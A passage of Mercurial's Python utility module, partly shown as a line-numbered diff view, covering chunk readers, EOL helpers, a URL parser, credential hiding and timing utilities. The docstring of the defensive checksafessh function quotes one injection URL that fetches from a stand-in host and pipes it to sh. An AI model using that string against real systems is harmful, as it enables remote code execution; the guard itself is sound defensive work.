            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of the unconsumed part of the chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
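
# Usage sketch for chunkbuffer above (illustrative, not part of the original
# module): it adapts an iterator of arbitrarily sized chunks to a file-like
# read(n) interface:
#
#   buf = chunkbuffer(iter([b'abc', b'defgh']))
#   buf.read(4)   # -> 'abcd', crossing the chunk boundary
#   buf.read(10)  # -> 'efgh' (less than requested; the iterator ran dry)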

def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data).  Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
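
# Usage sketch for filechunkiter above (illustrative, not part of the
# original module): stream a file in bounded chunks instead of reading it
# whole; 'src' and consume() are hypothetical:
#
#   fp = open('src', 'rb')
#   try:
#       for chunk in filechunkiter(fp, size=65536):
#           consume(chunk)
#   finally:
#       fp.close()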

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)
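
# Usage sketch for cappedreader above (illustrative, not part of the original
# module): cap how far a consumer can read into a stream, e.g. to stop at a
# frame boundary; fh is any file object:
#
#   reader = cappedreader(fh, 10)
#   reader.read()   # at most 10 bytes from fh
#   reader.read()   # -> b'' once the cap is exhausted (treated as EOF)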

def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
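
# Example for bytecount above (illustrative, not part of the original
# module): unitcountfn() scans the table top-down and uses the first row
# whose threshold (multiplier * divisor) the count reaches:
#
#   bytecount(1)           # -> '1 bytes' (falls through to the last row)
#   bytecount(10 * 2**20)  # -> '10.0 MB' (matches the (10, 1 << 20) row)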

class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
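
# Example for the EOL helpers above (illustrative, not part of the original
# module): _eolre collapses any run of CRs before an LF, so:
#
#   tolf(b'a\r\nb\n')    # -> 'a\nb\n'
#   tocrlf(b'a\nb\r\n')  # -> 'a\r\nb\r\n'
#
# tonativeeol/fromnativeeol then pick the right direction for the platform.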

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ | buggy   | buggy           | okay
    # fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
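
# Usage sketch for iterfile() above (illustrative, not part of the original
# module): wrap any file object before iterating it line by line; the
# EINTR-safe path is only taken where the interpreter needs it:
#
#   for line in iterfile(fp):   # fp: e.g. a pipe from a subprocess
#       handle(line)            # handle() is a placeholder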

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using a doubled prefix
    to escape the prefix itself.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
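
# Example for interpolate() above (illustrative, not part of the original
# module): replace prefixed placeholders from a mapping:
#
#   interpolate(b'%', {b'a': b'x', b'b': b'y'}, b'%a-%b')  # -> 'x-y'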

def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)
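
# Example for getport() above (illustrative, not part of the original
# module):
#
#   getport(8080)     # -> 8080
#   getport(b'http')  # -> 80 on typical systems (resolved via getservbyname)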
2635
2633
2636 class url(object):
2634 class url(object):
2637 r"""Reliable URL parser.
2635 r"""Reliable URL parser.
2638
2636
2639 This parses URLs and provides attributes for the following
2637 This parses URLs and provides attributes for the following
2640 components:
2638 components:
2641
2639
2642 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2643
2641
2644 Missing components are set to None. The only exception is
2642 Missing components are set to None. The only exception is
2645 fragment, which is set to '' if present but empty.
2643 fragment, which is set to '' if present but empty.
2646
2644
2647 If parsefragment is False, fragment is included in query. If
2645 If parsefragment is False, fragment is included in query. If
2648 parsequery is False, query is included in path. If both are
2646 parsequery is False, query is included in path. If both are
2649 False, both fragment and query are included in path.
2647 False, both fragment and query are included in path.
2650
2648
2651 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2652
2650
2653 Note that for backward compatibility reasons, bundle URLs do not
2651 Note that for backward compatibility reasons, bundle URLs do not
2654 take host names. That means 'bundle://../' has a path of '../'.
2652 take host names. That means 'bundle://../' has a path of '../'.
2655
2653
2656 Examples:
2654 Examples:
2657
2655
2658 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2659 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2660 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2661 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2662 >>> url(b'file:///home/joe/repo')
2660 >>> url(b'file:///home/joe/repo')
2663 <url scheme: 'file', path: '/home/joe/repo'>
2661 <url scheme: 'file', path: '/home/joe/repo'>
2664 >>> url(b'file:///c:/temp/foo/')
2662 >>> url(b'file:///c:/temp/foo/')
2665 <url scheme: 'file', path: 'c:/temp/foo/'>
2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2666 >>> url(b'bundle:foo')
2664 >>> url(b'bundle:foo')
2667 <url scheme: 'bundle', path: 'foo'>
2665 <url scheme: 'bundle', path: 'foo'>
2668 >>> url(b'bundle://../foo')
2666 >>> url(b'bundle://../foo')
2669 <url scheme: 'bundle', path: '../foo'>
2667 <url scheme: 'bundle', path: '../foo'>
2670 >>> url(br'c:\foo\bar')
2668 >>> url(br'c:\foo\bar')
2671 <url path: 'c:\\foo\\bar'>
2669 <url path: 'c:\\foo\\bar'>
2672 >>> url(br'\\blah\blah\blah')
2670 >>> url(br'\\blah\blah\blah')
2673 <url path: '\\\\blah\\blah\\blah'>
2671 <url path: '\\\\blah\\blah\\blah'>
2674 >>> url(br'\\blah\blah\blah#baz')
2672 >>> url(br'\\blah\blah\blah#baz')
2675 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2676 >>> url(br'file:///C:\users\me')
2674 >>> url(br'file:///C:\users\me')
2677 <url scheme: 'file', path: 'C:\\users\\me'>
2675 <url scheme: 'file', path: 'C:\\users\\me'>
2678
2676
2679 Authentication credentials:
2677 Authentication credentials:
2680
2678
2681 >>> url(b'ssh://joe:xyz@x/repo')
2679 >>> url(b'ssh://joe:xyz@x/repo')
2682 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2683 >>> url(b'ssh://joe@x/repo')
2681 >>> url(b'ssh://joe@x/repo')
2684 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2685
2683
2686 Query strings and fragments:
2684 Query strings and fragments:
2687
2685
2688 >>> url(b'http://host/a?b#c')
2686 >>> url(b'http://host/a?b#c')
2689 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2690 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2691 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2692
2690
2693 Empty path:
2691 Empty path:
2694
2692
2695 >>> url(b'')
2693 >>> url(b'')
2696 <url path: ''>
2694 <url path: ''>
2697 >>> url(b'#a')
2695 >>> url(b'#a')
2698 <url path: '', fragment: 'a'>
2696 <url path: '', fragment: 'a'>
2699 >>> url(b'http://host/')
2697 >>> url(b'http://host/')
2700 <url scheme: 'http', host: 'host', path: ''>
2698 <url scheme: 'http', host: 'host', path: ''>
2701 >>> url(b'http://host/#a')
2699 >>> url(b'http://host/#a')
2702 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2703
2701
2704 Only scheme:
2702 Only scheme:
2705
2703
2706 >>> url(b'http:')
2704 >>> url(b'http:')
2707 <url scheme: 'http'>
2705 <url scheme: 'http'>
2708 """
2706 """
2709
2707
2710 _safechars = "!~*'()+"
2708 _safechars = "!~*'()+"
2711 _safepchars = "/!~*'()+:\\"
2709 _safepchars = "/!~*'()+:\\"
2712 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2713
2711
2714 def __init__(self, path, parsequery=True, parsefragment=True):
2712 def __init__(self, path, parsequery=True, parsefragment=True):
2715 # We slowly chomp away at path until we have only the path left
2713 # We slowly chomp away at path until we have only the path left
2716 self.scheme = self.user = self.passwd = self.host = None
2714 self.scheme = self.user = self.passwd = self.host = None
2717 self.port = self.path = self.query = self.fragment = None
2715 self.port = self.path = self.query = self.fragment = None
2718 self._localpath = True
2716 self._localpath = True
2719 self._hostport = ''
2717 self._hostport = ''
2720 self._origpath = path
2718 self._origpath = path
2721
2719
2722 if parsefragment and '#' in path:
2720 if parsefragment and '#' in path:
2723 path, self.fragment = path.split('#', 1)
2721 path, self.fragment = path.split('#', 1)
2724
2722
2725 # special case for Windows drive letters and UNC paths
2723 # special case for Windows drive letters and UNC paths
2726 if hasdriveletter(path) or path.startswith('\\\\'):
2724 if hasdriveletter(path) or path.startswith('\\\\'):
2727 self.path = path
2725 self.path = path
2728 return
2726 return
2729
2727
2730 # For compatibility reasons, we can't handle bundle paths as
2728 # For compatibility reasons, we can't handle bundle paths as
2731 # normal URLS
2729 # normal URLS
2732 if path.startswith('bundle:'):
2730 if path.startswith('bundle:'):
2733 self.scheme = 'bundle'
2731 self.scheme = 'bundle'
2734 path = path[7:]
2732 path = path[7:]
2735 if path.startswith('//'):
2733 if path.startswith('//'):
2736 path = path[2:]
2734 path = path[2:]
2737 self.path = path
2735 self.path = path
2738 return
2736 return
2739
2737
2740 if self._matchscheme(path):
2738 if self._matchscheme(path):
2741 parts = path.split(':', 1)
2739 parts = path.split(':', 1)
2742 if parts[0]:
2740 if parts[0]:
2743 self.scheme, path = parts
2741 self.scheme, path = parts
2744 self._localpath = False
2742 self._localpath = False
2745
2743
2746 if not path:
2744 if not path:
2747 path = None
2745 path = None
2748 if self._localpath:
2746 if self._localpath:
2749 self.path = ''
2747 self.path = ''
2750 return
2748 return
2751 else:
2749 else:
2752 if self._localpath:
2750 if self._localpath:
2753 self.path = path
2751 self.path = path
2754 return
2752 return
2755
2753
2756 if parsequery and '?' in path:
2754 if parsequery and '?' in path:
2757 path, self.query = path.split('?', 1)
2755 path, self.query = path.split('?', 1)
2758 if not path:
2756 if not path:
2759 path = None
2757 path = None
2760 if not self.query:
2758 if not self.query:
2761 self.query = None
2759 self.query = None
2762
2760
2763 # // is required to specify a host/authority
2761 # // is required to specify a host/authority
2764 if path and path.startswith('//'):
2762 if path and path.startswith('//'):
2765 parts = path[2:].split('/', 1)
2763 parts = path[2:].split('/', 1)
2766 if len(parts) > 1:
2764 if len(parts) > 1:
2767 self.host, path = parts
2765 self.host, path = parts
2768 else:
2766 else:
2769 self.host = parts[0]
2767 self.host = parts[0]
2770 path = None
2768 path = None
2771 if not self.host:
2769 if not self.host:
2772 self.host = None
2770 self.host = None
2773 # path of file:///d is /d
2771 # path of file:///d is /d
2774 # path of file:///d:/ is d:/, not /d:/
2772 # path of file:///d:/ is d:/, not /d:/
2775 if path and not hasdriveletter(path):
2773 if path and not hasdriveletter(path):
2776 path = '/' + path
2774 path = '/' + path
2777
2775
2778 if self.host and '@' in self.host:
2776 if self.host and '@' in self.host:
2779 self.user, self.host = self.host.rsplit('@', 1)
2777 self.user, self.host = self.host.rsplit('@', 1)
2780 if ':' in self.user:
2778 if ':' in self.user:
2781 self.user, self.passwd = self.user.split(':', 1)
2779 self.user, self.passwd = self.user.split(':', 1)
2782 if not self.host:
2780 if not self.host:
2783 self.host = None
2781 self.host = None
2784
2782
2785 # Don't split on colons in IPv6 addresses without ports
2783 # Don't split on colons in IPv6 addresses without ports
2786 if (self.host and ':' in self.host and
2784 if (self.host and ':' in self.host and
2787 not (self.host.startswith('[') and self.host.endswith(']'))):
2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2788 self._hostport = self.host
2786 self._hostport = self.host
2789 self.host, self.port = self.host.rsplit(':', 1)
2787 self.host, self.port = self.host.rsplit(':', 1)
2790 if not self.host:
2788 if not self.host:
2791 self.host = None
2789 self.host = None
2792
2790
2793 if (self.host and self.scheme == 'file' and
2791 if (self.host and self.scheme == 'file' and
2794 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2795 raise error.Abort(_('file:// URLs can only refer to localhost'))
2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2796
2794
2797 self.path = path
2795 self.path = path
2798
2796
2799 # leave the query string escaped
2797 # leave the query string escaped
2800 for a in ('user', 'passwd', 'host', 'port',
2798 for a in ('user', 'passwd', 'host', 'port',
2801 'path', 'fragment'):
2799 'path', 'fragment'):
2802 v = getattr(self, a)
2800 v = getattr(self, a)
2803 if v is not None:
2801 if v is not None:
2804 setattr(self, a, urlreq.unquote(v))
2802 setattr(self, a, urlreq.unquote(v))
2805
2803
2806 @encoding.strmethod
2804 @encoding.strmethod
2807 def __repr__(self):
2805 def __repr__(self):
2808 attrs = []
2806 attrs = []
2809 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2810 'query', 'fragment'):
2808 'query', 'fragment'):
2811 v = getattr(self, a)
2809 v = getattr(self, a)
2812 if v is not None:
2810 if v is not None:
2813 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2814 return '<url %s>' % ', '.join(attrs)
2812 return '<url %s>' % ', '.join(attrs)
2815
2813
2816 def __bytes__(self):
2814 def __bytes__(self):
2817 r"""Join the URL's components back into a URL string.
2815 r"""Join the URL's components back into a URL string.
2818
2816
2819 Examples:
2817 Examples:
2820
2818
2821 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2822 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2824 'http://user:pw@host:80/?foo=bar&baz=42'
2822 'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

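    # Illustrative sketch (not part of the class): for a URL carrying
    # credentials, ``authinfo()`` strips them from the returned URL and
    # packages them separately for the password manager, e.g.:
    #
    #   u = url(b'http://joe:secret@example.com/repo')
    #   u.authinfo()
    #   -> ('http://example.com/repo',
    #       (None, ('http://example.com/repo', 'example.com'),
    #        'joe', 'secret'))
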
    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

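# Illustrative sketch (not part of the module): these helpers answer simple
# questions about a path, e.g.:
#
#   hasscheme(b'http://example.com/repo')  -> True
#   hasscheme(b'/home/joe/repo')           -> False
#   hasdriveletter(b'c:/tmp/foo')          -> True
#   hasdriveletter(b'/tmp/foo')            -> False
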
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

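# Illustrative sketch (not part of the module):
#
#   checksafessh(b'ssh://example.com/repo')         # returns quietly
#   checksafessh(b'ssh://-oProxyCommand=evil/repo') # raises error.Abort
#
# Note that the path is unquoted first, so percent-encoding the leading
# dash does not bypass the check.
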
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

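# Illustrative sketch (not part of the module):
#
#   hidepassword(b'http://joe:secret@example.com/repo')
#   -> 'http://joe:***@example.com/repo'
#   removeauth(b'http://joe:secret@example.com/repo')
#   -> 'http://example.com/repo'
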
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

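# Illustrative sketch, assuming unitcountfn (defined earlier in this module)
# picks the first (multiplier, divisor, format) row whose threshold the
# value reaches:
#
#   timecount(2.5)     -> '2.500 s'
#   timecount(0.0305)  -> '30.50 ms'
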
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

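# Illustrative sketch (not part of the module; do_expensive_work is a
# placeholder):
#
#   with timedcm(b'loading %s', b'manifest') as stats:
#       do_expensive_work()
#   # stats.elapsed now holds the wall time in seconds, and bytes(stats)
#   # renders it human-readably, e.g. '1.234 s'.
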
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

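# Illustrative sketch (not part of the module):
#
#   h = hooks()
#   h.add(b'b-extension', lambda x: x * 2)
#   h.add(b'a-extension', lambda x: x + 1)
#   h(10)  # -> [11, 20]; hooks run sorted by source name
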